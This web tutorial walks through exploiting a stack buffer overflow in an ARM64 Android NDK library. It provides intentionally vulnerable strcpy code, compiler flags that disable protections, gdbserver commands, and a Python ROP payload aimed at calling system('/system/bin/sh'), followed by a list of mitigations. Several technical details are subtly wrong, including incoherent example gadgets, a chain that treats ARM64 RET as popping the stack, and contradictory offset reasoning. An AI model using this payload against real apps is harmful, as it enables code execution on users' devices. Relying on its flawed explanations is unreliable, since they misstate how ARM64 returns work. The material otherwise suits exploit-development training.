Introduction: The Peril of Stack Overflows in ARM64 NDK Binaries
Stack overflows remain a critical vulnerability class, even in modern ARM64 architectures. While traditional buffer overflows targeting x86’s EIP are well-documented, exploiting them on ARM64 platforms, particularly within Android NDK applications, introduces unique architectural considerations. This article delves into the intricacies of identifying, analyzing, and exploiting stack buffer overflows in ARM64 native binaries on Android, focusing on understanding ARM64 assembly, debugging techniques, and control flow hijacking.
Setting Up Your Android Reverse Engineering Environment
Before diving into exploitation, a robust environment is crucial. You’ll need:
- Android device (rooted or emulator)
- Android Debug Bridge (ADB)
- Android NDK for cross-compilation
- Disassembler/Decompiler (IDA Pro or Ghidra)
- GDB client and server (pre-built `gdbserver` for ARM64 on Android)
- Optional: Frida for dynamic instrumentation
Ensure your `adb` is configured and your device is accessible. For a rooted device, push `gdbserver` to `/data/local/tmp` and grant execute permissions:
adb push <ndk-path>/toolchains/llvm/prebuilt/linux-x86_64/lib64/clang/<version>/lib/arm64-v8a/gdbserver /data/local/tmp/gdbserveradb shell "chmod 755 /data/local/tmp/gdbserver"
Identifying the Vulnerability: A C/C++ Example
A classic stack buffer overflow occurs when a program writes more data to a buffer located on the stack than it was designed to hold, overwriting adjacent stack frames, including the saved return address (Link Register, LR). Consider this vulnerable C++ NDK function:
#include <string>#include <vector>#include <jni.h>extern "C" JNIEXPORT jstring JNICALLJava_com_example_vulnerableapp_MainActivity_vulnerableFunction(JNIEnv* env, jobject /* this */, jstring inputString) { char buffer[128]; const char* nativeString = env->GetStringUTFChars(inputString, 0); strcpy(buffer, nativeString); // Vulnerable! No bounds checking env->ReleaseStringUTFChars(inputString, nativeString); std::string hello = "Processed: "; hello += buffer; return env->NewStringUTF(hello.c_str());}
The `strcpy` function here is the culprit. It copies the entire `nativeString` into `buffer` without checking `buffer`’s size, leading to a potential overflow if `nativeString` exceeds 128 bytes.
Compiling for ARM64
To compile this with NDK, you’d typically use `cmake` or `ndk-build`. For `ndk-build`, a simple `Android.mk` might look like:
LOCAL_PATH := $(call my-dir)include $(CLEAR_VARS)LOCAL_MODULE := native-libLOCAL_SRC_FILES := native-lib.cppLOCAL_CFLAGS += -fno-stack-protector # Disable stack canaries for easier exploitationLOCAL_LDFLAGS += -Wl,-z,norelro # Disable RELRO for easier exploitationinclude $(BUILD_SHARED_LIBRARY)
Build specifically for ARM64-v8a:
ndk-build APP_ABI=arm64-v8a
ARM64 Assembly Analysis: Understanding the Stack Frame
Once compiled, load the `libnative-lib.so` into IDA Pro or Ghidra. Locate `Java_com_example_vulnerableapp_MainActivity_vulnerableFunction`. On ARM64, the stack frame layout is critical:
- `SP` (Stack Pointer): Points to the top of the stack.
- `FP` (Frame Pointer, `X29`): Optionally points to the base of the current stack frame.
- `LR` (Link Register, `X30`): Holds the return address for the function call.
- Local variables are allocated on the stack below `FP`/`LR`.
A typical ARM64 function prologue might look like this:
STP X29, X30, [SP, #-0xYY]! ; Push FP and LR onto the stack, adjust SPMOV X29, SP ; Set FP to current SP position
And the epilogue:
LDP X29, X30, [SP], #0xYY ; Pop FP and LR from stack, adjust SPRET ; Return using the value in LR
Your goal is to fill the `buffer` to overwrite the saved `LR` value on the stack. By controlling `LR`, you control the program’s execution flow upon function return.
Calculating the Offset to LR
Using your disassembler:
- Identify the `buffer` allocation size (e.g., `sub sp, sp, #0xYYY` or `sub sp, sp, #(0x10 * N)`).
- Determine the distance from the start of `buffer` to the saved `X29` and `X30` (LR) on the stack. The `buffer` is usually allocated relative to `SP` or `X29`.
- Example: If `buffer` is `char buffer[128]` and the stack frame is aligned to 16 bytes, `LR` might be at `buffer + 128 + padding + 8` bytes (where 8 bytes is the size of `X29` and `X30` is 8 bytes later). A common pattern is `[SP, #0xYY]` for buffer and `[SP, #0xZZ]` for saved LR/FP. The offset will be `ZZ – YY` plus the buffer size. Let’s assume after analysis, we find the `buffer` starts at `SP+0x10` and `X30` is saved at `SP+0x90`. The offset would be `(0x90 – 0x10) = 0x80` bytes. If `buffer` is 128 bytes, then `0x80` (128 decimal) means it’s tightly packed. If `buffer` is 128 bytes (0x80), and `X30` is saved immediately after, the offset would be 128 bytes. The exact offset depends on padding and compiler optimizations. For `buffer[128]`, the overflow will typically overwrite the saved `X29` and then `X30` (LR). So the offset to `LR` will be `128 + 8 = 136` bytes if `X29` is saved immediately before `X30`.
Debugging the Crash and Confirming Control
To confirm the overflow and gain control, attach `gdbserver` to your process:
adb shell"/data/local/tmp/gdbserver :1234 --attach $(pidof com.example.vulnerableapp)"
On your host machine, forward the port and connect with `aarch64-linux-android-gdb` (from NDK):
adb forward tcp:1234 tcp:1234aarch64-linux-android-gdb./libnative-lib.so target remote :1234
Now, send an input string larger than 128 bytes (e.g., 144 ‘A’s). If the offset is 136, 136 ‘A’s and 8 ‘B’s would overwrite `LR` with `0x4242424242424242`. The application should crash, and GDB should show `LR` (or `PC`) pointing to your overwritten address, e.g., `0x4242424242424242`.
Exploitation Strategy: Return-Oriented Programming (ROP)
Modern systems employ W^X (Write XOR Execute) and ASLR (Address Space Layout Randomization). To bypass W^X, we use Return-Oriented Programming (ROP). ASLR makes it harder to predict addresses, requiring an information leak first; for this tutorial, we’ll assume a simpler scenario where we either know an address or focus on controlling LR. In a real exploit, you’d likely leak an address first.
A ROP chain consists of short sequences of existing code (gadgets) ending in a `RET` instruction, chained together. Each gadget performs a small action (e.g., pop values into registers, perform arithmetic) before returning to the next gadget in your chain.
Finding ARM64 Gadgets
Tools like ROPgadget or directly searching in IDA/Ghidra can help. Common ARM64 `RET` instructions are `RET`, but also `BR XN` where `XN` contains a controlled address. A simple gadget might be:
POP_X8_RET: ; ADRP X8, #offset_to_some_data_or_function ; LDR X8, [X8, #offset] ; BR X8 ; or RET
More useful gadgets are those that manipulate registers and then `RET`:
POP_X0_X1_X2_X3_X4_X5_LR: ; STP X28, X29, [SP, #-0x30]! ; LDP X0, X1, [SP, #0x20] ; LDP X2, X3, [SP, #0x30] ; LDP X4, X5, [SP, #0x40] ; LDP X29, X30, [SP, #0x50] ; ADD SP, SP, #0x60 ; RET
This (hypothetical) gadget would pop several registers from the stack, then pop `LR` and return. You’d place the values for `X0-X5` and the next gadget’s address on the stack after the current gadget’s address.
Your primary goal is usually to call `mprotect` to make a writable memory region executable, then jump to your shellcode within that region. Alternatively, if a `system()` or `execve()` wrapper is available and addresses are known, you could jump directly to it with controlled arguments.
Constructing the Exploit Payload
Let’s assume we want to call a function at a known address (e.g., `system` from `libc`, or a `printf` to leak info). We need to place its address in `LR` and its arguments in `X0-X7`.
- **Offset**: Determine the exact byte offset to overwrite the saved `LR`. Let’s say it’s 136 bytes.
- **Payload Structure**: `[padding (136 bytes)] + [address_of_gadget_1] + [args for gadget_1] + [address_of_gadget_2] + … + [address_of_shellcode]`
- **Example ROP Chain (Conceptual)**: If you wanted to call `system(“/system/bin/sh”)` and had an information leak, you’d find:
- An address to the string `”/system/bin/sh”` or place it on the stack.
- The address of `system()` in `libc.so`.
- A gadget like `POP X0; RET` to put the string address into `X0`.
Your buffer would look something like this:
#!/usr/bin/env pythonfrom pwn import * # Or just plain Python# Assuming offset to LR is 136 bytesoffset_to_lr = 136# Known address of system() and "/system/bin/sh" in libc (requires ASLR bypass/leak)addr_system = 0xAAAAAAAAAAAAAAA0 # Example: Actual address from libc baseaddr_bin_sh = 0xBBBBBBBBBBBBBBB0 # Example: Actual address from a data segment or stack# ROP Gadgets (example, these addresses need to be found in the binary)addr_pop_x0_ret = 0xCCCCCCCCCCCCCCC0 # Gadget: LDR X0, [SP, #0x8]; ADD SP, SP, #0x10; RET# Craft the payloadpayload = b"A" * offset_to_lrpayload += p64(addr_pop_x0_ret) # Overwrite LR with address of pop X0 gadgetpayload += p64(addr_bin_sh) # Value for X0 (argument to system)payload += p64(addr_system) # Next address after pop X0 (this becomes the return address for pop_x0_ret)print(payload)
Send this crafted `payload` as the input string to `vulnerableFunction`. The `strcpy` will overflow, write `p64(addr_pop_x0_ret)` into `LR`. When `vulnerableFunction` returns, it will jump to `addr_pop_x0_ret`. That gadget will load `addr_bin_sh` into `X0`, and then return to `addr_system`, effectively calling `system(“/system/bin/sh”)`.
Mitigation Strategies
Preventing stack overflows is far simpler than exploiting them:
- **Bounds Checking**: Always use safe functions like `strncpy`, `strlcpy`, or C++ `std::string` which handle bounds checking.
- **Stack Canaries**: Compiler-generated values placed on the stack before the return address. If tampered with, the program aborts. (Disabled in our example with `-fno-stack-protector`).
- **ASLR (Address Space Layout Randomization)**: Randomizes memory addresses, making ROP harder without an information leak.
- **NX (Never eXecute) Bit / W^X**: Prevents code execution from data segments, forcing ROP.
- **RELRO (Relocation Read-Only)**: Hardens GOT/PLT, preventing overwrites of function pointers. (Disabled in our example with `-Wl,-z,norelro`).
Conclusion
Exploiting ARM64 stack overflows in Android NDK requires a deep understanding of ARM64 architecture, calling conventions, and debugging techniques. By carefully analyzing the stack frame, calculating offsets, and crafting ROP chains, an attacker can gain arbitrary code execution. However, robust defensive programming practices and compiler-level mitigations are highly effective at preventing these types of attacks, underscoring the importance of secure coding standards in native Android development.
Android Mobile Specs & Compare Directory
Are you researching mobile hardware properties, processor SoCs, GPU chipsets, or RAM configurations? Access our complete specs catalog to compare up to 5 devices side-by-side!
Compare Devices Specs →